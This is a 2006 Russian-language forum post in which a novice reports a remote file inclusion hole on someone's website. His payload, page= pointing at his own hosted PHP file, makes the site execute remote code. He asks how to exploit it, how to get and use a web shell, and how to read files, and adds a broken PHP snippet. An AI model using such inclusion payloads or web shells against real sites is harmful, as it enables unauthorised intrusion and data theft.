Объясните пожалуйста, нашел php-inj, что можно с нею сделать?

Объясните пожалуйста, нашел php-inj, что можно с нею сделать?

03.09.2006, 02:36

Марсеанчег

Новичок

Регистрация: 29.08.2006

Сообщений: 4

С нами: 10368231

Репутация: 0

Объясните пожалуйста, нашел php-inj, что можно с нею сделать?

На одном из сайтов нашел возможность инклуда файла в параметр страницы page=http://mysite.com/icx и файл icx.php выполнеятся. Что можно с этим сделать? Например использовать shell(я в этом темный, объясните или пошлите куда-то прочитать, что оно есть ... и ссылку откуда скачать можно шелл с манулом

) )Ну или считать содержимое файлов как? Вот таким кодом хочу считать содержимое файла

PHP код:


		
			
    if (fopen("http://www.somesite.com/main.php", "r")) { 

    echo "I can open it!";

    $lines = file("http://www.somesite.com/main.php") 





    foreach ($lines as $line_num => $line) {

    echo "#<b>{$line_num}</b> : " . htmlspecialchars($line) . "<br />\n";

    }